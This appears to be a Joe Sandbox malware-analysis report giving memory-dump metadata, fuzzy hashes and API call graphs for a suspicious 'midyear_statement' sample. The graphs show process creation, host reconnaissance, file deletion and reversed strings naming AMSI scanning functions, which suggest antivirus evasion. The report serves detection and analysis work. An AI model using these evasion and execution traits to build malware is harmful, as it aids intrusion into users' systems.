• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: 3a11e62541d36c545c66c501bcb48c8268746754cfc04c33e66829e85f1defa6
• Instruction ID: 97485225dd137b54f2f75bd516342e2b228fe96eca9195b6cfb5c13ec23fef1d
• Opcode Fuzzy Hash: 3a11e62541d36c545c66c501bcb48c8268746754cfc04c33e66829e85f1defa6
• Instruction Fuzzy Hash: 5B415371A002589BEB61DBA8CC84BDAB7FCAB18308F0440E5A548F7291D7B5BF94CF50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dab1cbe13cac4fb33e3239648d7e79b5c3ff788611e248b7fc3451f4619a14ae
• Instruction ID: 9bf8433f627389c0b11d0779f780cf949187eef61bac3a8c5154bd3d3f673d7a
• Opcode Fuzzy Hash: dab1cbe13cac4fb33e3239648d7e79b5c3ff788611e248b7fc3451f4619a14ae
• Instruction Fuzzy Hash: 94A1D4767106104BE718EAFC9C843EDB3D5DBC4369F18427EE115EF381EB68E9628290
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,040A951E), ref: 040A94B6
• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,040A951E), ref: 040A94BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
• Opcode ID: 3fb50975a63c28689453fc9abf89faae6d179c34addeef8589135468415edca8
• Instruction ID: 085d3aff849be4bca6a52e9ac56944b50355b727cdfb0ed2df45b7f275ba45df
• Opcode Fuzzy Hash: 3fb50975a63c28689453fc9abf89faae6d179c34addeef8589135468415edca8
• Instruction Fuzzy Hash: 672151B5A001189FEB14EFE8C841AEEB7F8EF48708F5148A5E944F7650D770BE608B61
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 040B9F70
• IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 040B9FA0
• IsBadReadPtr.KERNEL32(?,00000008), ref: 040B9FBF
• IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 040B9FCB
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: Read$Write
• String ID:
• API String ID: 3448952669-0
• Opcode ID: 946895becdb6801529fb54b334e6d0e3e237b3b738d6d3b284648f9b58eaed70
• Instruction ID: a6233d1ab349bdb5cda26fb7b6ca2b0f3e20d1f2a745a168b857bc745ca9cfcb
• Opcode Fuzzy Hash: 946895becdb6801529fb54b334e6d0e3e237b3b738d6d3b284648f9b58eaed70
• Instruction Fuzzy Hash: B721B4B164021A9BDF10CF68CC80BEEB3A8EF44364F048511FE94A7345D734F81196E8
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 15.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.8%
Total number of Nodes: 144
Total number of Limit Nodes: 2

Callgraph

Control-flow Graph

APIs
• Part of subcall function 613C1861: LoadLibraryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,613C19DB), ref: 613C187C
• WinExec.KERNEL32 ref: 613C1AAC
• ExitProcess.KERNEL32 ref: 613C1AEA
Strings
Memory Dump Source
• Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
• Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
Similarity
• API ID: ExecExitLibraryLoadProcess
• String ID: :C$K\23mets$T\.\$\$cSis$cSis$epOismA$gnirtSna$ismA$mA$mA$niw\$noisseSn$reffuBna$tab.OCED$thgiSeur$ys\ swod
• API String ID: 3018545565-3597500037
• Opcode ID: 46f46fb923760554c8cdad2d512a32108210c746ceaa1b5bcb389bcb2f4d4843
• Instruction ID: 869a93a5f3fef28c2d055c4f4f9ffa1e2d27d3cc544e6791dff0e5bdc2d58e8f
• Opcode Fuzzy Hash: 46f46fb923760554c8cdad2d512a32108210c746ceaa1b5bcb389bcb2f4d4843
• Instruction Fuzzy Hash: 1541E472B11B66DCEF00CBAAE8942DD27B4B785B8CF504429CE4E2BB18EB34C605D351
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RtlAddFunctionTable.KERNEL32 ref: 613C254A
Strings
Memory Dump Source
• Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
• Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
Similarity
• API ID: FunctionTable
• String ID: .pdata
• API String ID: 1252446317-4177594709
• Opcode ID: 6e795cd99005c9a4713801c9161cfb8332b217f622d565cc902d40eb531e0eb9
• Instruction ID: c2e9da794e7722b98bd5b15d45919db4196a2cce8ea7ba1d78af53bbfdc8ed06
• Opcode Fuzzy Hash: 6e795cd99005c9a4713801c9161cfb8332b217f622d565cc902d40eb531e0eb9
• Instruction Fuzzy Hash: 6921D232712264CBFB058F79DA54394BAA2A788F98F4CD020CE0A57304EB3ACA61C751
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 55 613c1861-613c1894 LoadLibraryW 57 613c1915-613c191f 55->57 58 613c1896-613c1911 55->58 58->57
APIs
• LoadLibraryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,613C19DB), ref: 613C187C
Memory Dump Source
• Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
• Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 4d4034f170e7b50da01eb1e42fe402126a14cda3a19cef280cafa70307daf033
• Instruction ID: a1738e7a690e1def25e53057858ca31072caabc364c62996bec2843146fe0757
• Opcode Fuzzy Hash: 4d4034f170e7b50da01eb1e42fe402126a14cda3a19cef280cafa70307daf033
• Instruction Fuzzy Hash: 51119276B11F248CEB40DBA6E89439D37B5F348B88F144425DE5D67B68EF76C6A08380
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RtlCaptureContext.KERNEL32 ref: 613C21D4
• RtlLookupFunctionEntry.KERNEL32 ref: 613C21EB
• RtlVirtualUnwind.KERNEL32 ref: 613C222D
• SetUnhandledExceptionFilter.KERNEL32 ref: 613C2274
• UnhandledExceptionFilter.KERNEL32 ref: 613C2281
• GetCurrentProcess.KERNEL32 ref: 613C2287
• TerminateProcess.KERNEL32 ref: 613C2295
Memory Dump Source
• Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
• Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
• String ID:
• API String ID: 3266983031-0
• Opcode ID: 985607aebff6136b1778f8ff14b1f1c33eaf51cc4eef6287d5f470909748209d
                                                                                                                                                                                          • Instruction ID: 91bb17bd43d347dcd4531fdc855fd7abcf8bcbfe504f61127b71ba03a574cec5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 985607aebff6136b1778f8ff14b1f1c33eaf51cc4eef6287d5f470909748209d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E21EF71612B3099EB008B61F8843C937AAB748B88F58552AD94F23724EF3AC724C380
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF790070000, based on PE: true
• Associated: 00000010.00000002.1294523077.00007FF790070000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000010.00000002.1294564988.00007FF79008C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000010.00000002.1294587403.00007FF79008D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff790070000_2506803.jbxd
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
• Opcode ID: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
• Instruction ID: 55e48057a3c6e899965bea9d96c39b0ed8792e0f34fe141c21300b32bc204253
• Opcode Fuzzy Hash: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
• Instruction Fuzzy Hash: AE113032614F81CAEF20DF78E85826973A4F749758F441A31EA6D47768DF3DE1A48350
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[graph image not reproduced in text; legend: Executed / Not Executed. Function at 613c1d20, basic blocks 613c1d20 through 613c2054, internal calls to 613c1b40, 613c1bb0, 613c2a20 and 613c2e80, API calls VirtualQuery at 613c1ec3-613c1ed6 and VirtualProtect at 613c1edc-613c1ef5]
APIs
• VirtualQuery.KERNEL32(?,?,?,?,?,?,613C4014,?,?,?,?,613C12F5), ref: 613C1ED0
• VirtualProtect.KERNEL32(?,?,?,?,?,?,613C4014,?,?,?,?,613C12F5), ref: 613C1EF2
Strings
• Unknown pseudo relocation bit size %d., xrefs: 613C1FAB
• VirtualQuery failed for %d bytes at address %p, xrefs: 613C1CF1, 613C1FF5
• Unknown pseudo relocation protocol version %d., xrefs: 613C200C
Memory Dump Source
• Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
• Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
Similarity
• API ID: Virtual$ProtectQuery
• String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
• API String ID: 1027372294-974437099
• Opcode ID: 0506fc0812a6532e595ec5eb3817d96166fe1220901b1217ccaca6be0b2030cb
• Instruction ID: 8b19c1d28792cb56a2489f17691e3257573fe42bf3fac7028ea06e892639a53c
• Opcode Fuzzy Hash: 0506fc0812a6532e595ec5eb3817d96166fe1220901b1217ccaca6be0b2030cb
• Instruction Fuzzy Hash: 2371DB76B11A25C5EB01CB66E98078A7372B744FECF88C216CD1E17758DB3AC905E782
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetSystemTimeAsFileTime.KERNEL32 ref: 613C2125
• GetCurrentProcessId.KERNEL32 ref: 613C2130
• GetCurrentThreadId.KERNEL32 ref: 613C2138
• GetTickCount.KERNEL32 ref: 613C2140
• QueryPerformanceCounter.KERNEL32 ref: 613C214D
Memory Dump Source
• Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
• Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 74dd19f4e94a0d0c7d2f512cedf46a5700d2f37f9f80a699a897ab5269ff7fc9
• Instruction ID: f1121d54ed6ad7c6b44c785f3bc5d17666f8aeef939fc9792c255a14141ab0b9
• Opcode Fuzzy Hash: 74dd19f4e94a0d0c7d2f512cedf46a5700d2f37f9f80a699a897ab5269ff7fc9
• Instruction Fuzzy Hash: BD11BF36752A7086F7105B25F904385B262B788BE0F0C5231DE5E53BA4EA3EC9968340
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[graph image not reproduced in text; legend: Executed / Not Executed. Function at 613c1bb0, basic blocks 613c1bb0 through 613c2054, internal calls to 613c29d0, 613c2af0, 613c1b40, 613c1bb0, 613c2a20, 613c2e80 and memcpy, API calls VirtualQuery at 613c1c1f-613c1c6f and 613c1ec3-613c1ed6, VirtualProtect at 613c1edc-613c1ef5]
APIs
Strings
• Address %p has no image-section, xrefs: 613C1BB7, 613C1D02
• VirtualQuery failed for %d bytes at address %p, xrefs: 613C1CF1
Memory Dump Source
• Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
• Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
Similarity
• API ID: QueryVirtual
• String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
• API String ID: 1804819252-157664173
• Opcode ID: 4b3442590c100849448ba3e56ea47b0cf678686d7b5a80ce58739232cc369298
• Instruction ID: bbd5546ac0f113b28ab3ae70c7fcc4ca9aee0ecfaac13d73c3aea7a86ca27076
• Opcode Fuzzy Hash: 4b3442590c100849448ba3e56ea47b0cf678686d7b5a80ce58739232cc369298
• Instruction Fuzzy Hash: 71312477B01A64D5EA019F16EC04B967B65FB48FE8F48C121EE0E17320EB39DA42D740
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 2.6%
Dynamic/Decrypted Code Coverage: 99.4%
Signature Coverage: 5.1%
Total number of Nodes: 1887
Total number of Limit Nodes: 57
[execution graph image not reproduced in text; entry node 12364887 (CallCatchBlock); API calls visible on the graph include IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, LoadLibraryA, GetProcAddress and GetModuleFileNameW]
109036->109422 109040 1233ea2d 109448 12331e8d 109040->109448 109042 1233ea36 109043 1233ea93 109042->109043 109044 1233ea49 109042->109044 109454 12331e65 109043->109454 109712 1233fbb3 116 API calls 109044->109712 109047 1233eaa3 109051 12331e65 22 API calls 109047->109051 109048 1233ea5b 109049 12331e65 22 API calls 109048->109049 109050 1233ea67 109049->109050 109713 12340f37 36 API calls __EH_prolog 109050->109713 109052 1233eac2 109051->109052 109459 1233531e 109052->109459 109055 1233ead1 109464 12336383 109055->109464 109056 1233ea79 109714 1233fb64 77 API calls 109056->109714 109060 1233ea82 109715 1233f3b0 70 API calls 109060->109715 109066 12331fd8 11 API calls 109068 1233eefb 109066->109068 109067 12331fd8 11 API calls 109069 1233eafb 109067->109069 109310 123732f6 GetModuleHandleW 109068->109310 109070 12331e65 22 API calls 109069->109070 109071 1233eb04 109070->109071 109481 12331fc0 109071->109481 109073 1233eb0f 109074 12331e65 22 API calls 109073->109074 109075 1233eb28 109074->109075 109076 12331e65 22 API calls 109075->109076 109077 1233eb43 109076->109077 109078 1233ebae 109077->109078 109716 12336c1e 109077->109716 109079 12331e65 22 API calls 109078->109079 109085 1233ebbb 109079->109085 109081 1233eb70 109082 12331fe2 28 API calls 109081->109082 109083 1233eb7c 109082->109083 109086 12331fd8 11 API calls 109083->109086 109084 1233ec02 109485 1233d069 109084->109485 109085->109084 109091 12343549 3 API calls 109085->109091 109088 1233eb85 109086->109088 109721 12343549 RegOpenKeyExA 109088->109721 109089 1233ec08 109090 1233ea8b 109089->109090 109488 1234b2c3 109089->109488 109090->109066 109097 1233ebe6 109091->109097 109095 1233f34f 109814 123439a9 30 API calls 109095->109814 109096 1233ec23 109099 1233ec76 109096->109099 109505 12337716 109096->109505 109097->109084 109724 123439a9 30 API calls 109097->109724 109100 12331e65 22 API calls 109099->109100 109103 1233ec7f 109100->109103 109112 1233ec90 109103->109112 109113 1233ec8b 
109103->109113 109105 1233f365 109815 12342475 65 API calls ___scrt_get_show_window_mode 109105->109815 109106 1233ec42 109725 12337738 30 API calls 109106->109725 109107 1233ec4c 109110 12331e65 22 API calls 109107->109110 109121 1233ec55 109110->109121 109111 1233f36f 109115 1234bc5e 28 API calls 109111->109115 109118 12331e65 22 API calls 109112->109118 109728 12337755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 109113->109728 109114 1233ec47 109726 12337260 97 API calls 109114->109726 109120 1233f37f 109115->109120 109119 1233ec99 109118->109119 109509 1234bc5e 109119->109509 109614 12343a23 RegOpenKeyExW 109120->109614 109121->109099 109127 1233ec71 109121->109127 109123 1233eca4 109513 12331f13 109123->109513 109727 12337260 97 API calls 109127->109727 109128 12331f09 11 API calls 109131 1233f39c 109128->109131 109134 12331f09 11 API calls 109131->109134 109136 1233f3a5 109134->109136 109135 12331e65 22 API calls 109137 1233ecc1 109135->109137 109617 1233dd42 109136->109617 109141 12331e65 22 API calls 109137->109141 109143 1233ecdb 109141->109143 109142 1233f3af 109144 12331e65 22 API calls 109143->109144 109145 1233ecf5 109144->109145 109146 12331e65 22 API calls 109145->109146 109147 1233ed0e 109146->109147 109148 1233ed7b 109147->109148 109149 12331e65 22 API calls 109147->109149 109150 1233ed8a 109148->109150 109155 1233ef06 ___scrt_get_show_window_mode 109148->109155 109154 1233ed23 _wcslen 109149->109154 109151 1233ed93 109150->109151 109176 1233ee0f ___scrt_get_show_window_mode 109150->109176 109152 12331e65 22 API calls 109151->109152 109153 1233ed9c 109152->109153 109156 12331e65 22 API calls 109153->109156 109154->109148 109157 12331e65 22 API calls 109154->109157 109789 123436f8 RegOpenKeyExA 109155->109789 109158 1233edae 109156->109158 109159 1233ed3e 109157->109159 109161 12331e65 22 API calls 109158->109161 109163 12331e65 22 API calls 109159->109163 109162 1233edc0 109161->109162 109166 12331e65 22 API calls 
109162->109166 109164 1233ed53 109163->109164 109729 1233da34 109164->109729 109165 1233ef51 109167 12331e65 22 API calls 109165->109167 109169 1233ede9 109166->109169 109170 1233ef76 109167->109170 109174 12331e65 22 API calls 109169->109174 109535 12332093 109170->109535 109172 12331f13 28 API calls 109173 1233ed72 109172->109173 109177 12331f09 11 API calls 109173->109177 109178 1233edfa 109174->109178 109525 12343947 109176->109525 109177->109148 109787 1233cdf9 46 API calls _wcslen 109178->109787 109179 1233ef88 109541 1234376f RegCreateKeyA 109179->109541 109184 1233eea3 ctype 109188 12331e65 22 API calls 109184->109188 109185 1233ee0a 109185->109176 109186 12331e65 22 API calls 109187 1233efaa 109186->109187 109547 1236baac 109187->109547 109189 1233eeba 109188->109189 109189->109165 109192 1233eece 109189->109192 109194 12331e65 22 API calls 109192->109194 109193 1233efc1 109792 1234cd9b 87 API calls ___scrt_get_show_window_mode 109193->109792 109196 1233eed7 109194->109196 109195 1233efe4 109199 12332093 28 API calls 109195->109199 109198 1234bc5e 28 API calls 109196->109198 109202 1233eee3 109198->109202 109201 1233eff9 109199->109201 109200 1233efc8 CreateThread 109200->109195 111134 1234d45d 10 API calls 109200->111134 109204 12332093 28 API calls 109201->109204 109788 1233f474 113 API calls 109202->109788 109205 1233f008 109204->109205 109551 1234b4ef 109205->109551 109206 1233eee8 109206->109165 109207 1233eeef 109206->109207 109207->109090 109210 12331e65 22 API calls 109211 1233f019 109210->109211 109212 12331e65 22 API calls 109211->109212 109213 1233f02b 109212->109213 109214 12331e65 22 API calls 109213->109214 109215 1233f04b 109214->109215 109216 1236baac _strftime 39 API calls 109215->109216 109217 1233f058 109216->109217 109218 12331e65 22 API calls 109217->109218 109219 1233f063 109218->109219 109220 12331e65 22 API calls 109219->109220 109221 1233f074 109220->109221 109222 12331e65 22 API calls 109221->109222 109223 1233f089 109222->109223 
109224 12331e65 22 API calls 109223->109224 109225 1233f09a 109224->109225 109226 1233f0a1 StrToIntA 109225->109226 109575 12339de4 109226->109575 109229 12331e65 22 API calls 109230 1233f0bc 109229->109230 109231 1233f101 109230->109231 109232 1233f0c8 109230->109232 109234 12331e65 22 API calls 109231->109234 109793 123644ea 109232->109793 109236 1233f111 109234->109236 109240 1233f159 109236->109240 109241 1233f11d 109236->109241 109237 12331e65 22 API calls 109238 1233f0e4 109237->109238 109239 1233f0eb CreateThread 109238->109239 109239->109231 111137 12349fb4 112 API calls 2 library calls 109239->111137 109242 12331e65 22 API calls 109240->109242 109243 123644ea new 22 API calls 109241->109243 109244 1233f162 109242->109244 109245 1233f126 109243->109245 109248 1233f16e 109244->109248 109249 1233f1cc 109244->109249 109246 12331e65 22 API calls 109245->109246 109247 1233f138 109246->109247 109252 1233f13f CreateThread 109247->109252 109251 12331e65 22 API calls 109248->109251 109250 12331e65 22 API calls 109249->109250 109254 1233f1d5 109250->109254 109253 1233f17e 109251->109253 109252->109240 111136 12349fb4 112 API calls 2 library calls 109252->111136 109257 12331e65 22 API calls 109253->109257 109255 1233f1e1 109254->109255 109256 1233f21a 109254->109256 109260 12331e65 22 API calls 109255->109260 109600 1234b60d GetComputerNameExW GetUserNameW 109256->109600 109259 1233f193 109257->109259 109800 1233d9e8 109259->109800 109262 1233f1ea 109260->109262 109268 12331e65 22 API calls 109262->109268 109263 12331f13 28 API calls 109264 1233f22e 109263->109264 109266 12331f09 11 API calls 109264->109266 109270 1233f237 109266->109270 109271 1233f1ff 109268->109271 109269 12331f13 28 API calls 109272 1233f1b2 109269->109272 109273 1233f243 CreateThread 109270->109273 109274 1233f240 SetProcessDEPPolicy 109270->109274 109281 1236baac _strftime 39 API calls 109271->109281 109275 12331f09 11 API calls 109272->109275 109276 1233f264 109273->109276 109277 1233f258 
CreateThread 109273->109277 111107 1233f7a7 109273->111107 109274->109273 109280 1233f1bb CreateThread 109275->109280 109278 1233f279 109276->109278 109279 1233f26d CreateThread 109276->109279 109277->109276 111138 123420f7 145 API calls 109277->111138 109283 1233f2cc 109278->109283 109285 12332093 28 API calls 109278->109285 109279->109278 111139 123426db 38 API calls ___scrt_get_show_window_mode 109279->111139 109280->109249 111135 12331be9 49 API calls _strftime 109280->111135 109282 1233f20c 109281->109282 109811 1233c162 7 API calls 109282->109811 109611 123434ff RegOpenKeyExA 109283->109611 109286 1233f29c 109285->109286 109812 123352fd 28 API calls 109286->109812 109291 1233f2ed 109293 1234bc5e 28 API calls 109291->109293 109295 1233f2fd 109293->109295 109813 1234361b 31 API calls 109295->109813 109300 1233f313 109301 12331f09 11 API calls 109300->109301 109303 1233f31e 109301->109303 109302 1233f346 DeleteFileW 109302->109303 109304 1233f34d 109302->109304 109303->109111 109303->109302 109305 1233f334 Sleep 109303->109305 109304->109111 109305->109303 109306->108984 109307->108988 109308->108993 109309->108991 109310->109001 109311->109002 109312->109004 109313->109007 109314->109011 109315->109013 109320 1237fb68 109316->109320 109319 12368f5a 8 API calls 3 library calls 109319->109014 109323 1237fb85 109320->109323 109324 1237fb81 109320->109324 109322 123645bd 109322->109017 109322->109319 109323->109324 109326 12379ca6 109323->109326 109338 12364fcb 109324->109338 109327 12379cb2 CallCatchBlock 109326->109327 109345 12375888 EnterCriticalSection 109327->109345 109329 12379cb9 109346 12380183 109329->109346 109331 12379cc8 109332 12379cd7 109331->109332 109357 12379b3a 23 API calls 109331->109357 109359 12379cf3 LeaveCriticalSection std::_Lockit::~_Lockit 109332->109359 109335 12379ce8 CallCatchBlock 109335->109323 109336 12379cd2 109358 12379bf0 GetStdHandle GetFileType 109336->109358 109339 12364fd6 IsProcessorFeaturePresent 109338->109339 109340 
12364fd4 109338->109340 109342 12365018 109339->109342 109340->109322 109387 12364fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 109342->109387 109344 123650fb 109344->109322 109345->109329 109347 1238018f CallCatchBlock 109346->109347 109348 1238019c 109347->109348 109349 123801b3 109347->109349 109368 123705dd 20 API calls __dosmaperr 109348->109368 109360 12375888 EnterCriticalSection 109349->109360 109352 123801eb 109369 12380212 LeaveCriticalSection std::_Lockit::~_Lockit 109352->109369 109353 123801a1 __cftof CallCatchBlock 109353->109331 109354 123801bf 109354->109352 109361 123800d4 109354->109361 109357->109336 109358->109332 109359->109335 109360->109354 109370 12375af3 109361->109370 109363 123800e6 109367 123800f3 109363->109367 109377 12378a84 11 API calls 2 library calls 109363->109377 109366 12380145 109366->109354 109378 12376782 109367->109378 109368->109353 109369->109353 109375 12375b00 __Getctype 109370->109375 109371 12375b40 109385 123705dd 20 API calls __dosmaperr 109371->109385 109372 12375b2b RtlAllocateHeap 109373 12375b3e 109372->109373 109372->109375 109373->109363 109375->109371 109375->109372 109384 12372f80 7 API calls 2 library calls 109375->109384 